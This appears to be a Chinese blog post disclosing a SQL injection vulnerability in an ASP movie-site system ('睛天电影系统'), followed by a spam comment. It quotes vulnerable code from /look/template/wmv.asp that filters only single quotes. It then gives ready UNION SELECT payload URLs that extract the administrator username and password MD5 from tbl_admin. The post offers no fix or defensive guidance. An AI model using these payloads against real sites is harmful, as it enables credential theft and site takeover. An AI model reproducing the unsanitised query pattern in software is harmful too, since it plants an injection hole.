首页 » ASP代码 » 睛天电影系统最新注入漏洞

睛天电影系统最新注入漏洞

注入点:/look/template/wmv.asp
源码片段 :

1
2
3
4
5
6
7
8
9

<%
id=replace(request("url"),"'","")   '这儿只过滤了单引号
set rs=conn.execute("select top 1 url,id from qingtiandy_movieurl_tudou where id="&id)
IF rs.Eof Then
    response.Redirect G_error_page_1 :   response.End()
Else
    url=rs(0)
End IF
%>

使用方法:

javascript:document.write("<a href='/look/template/wmv.asp?url=-1 union select str_username,2 from tbl_admin'>科幻片</a> ");

访问打印出来的链接,查看源代码找到 查看管理员MD5为:

javascript:document.write("<a href='/look/template/wmv.asp?url=-1 union select str_pass,2 from tbl_admin'>科幻片</a> ");

, ,

转发到新浪微博 转发到新浪微博

目前这篇文章有46条评论(Rss)

  1. Ops | #1
    05/17/2012 at 09:16
     

    I hope you never stop! This is one of the best blogs Ive ever read. Youve got some mad skill here, man. I just hope that you dont lose your style because youre definitely one of the coolest bloggers out there. Please keep it up because the internet needs someone like you spreading the word.

1 8 9 10
我要评论

上一篇:

下一篇: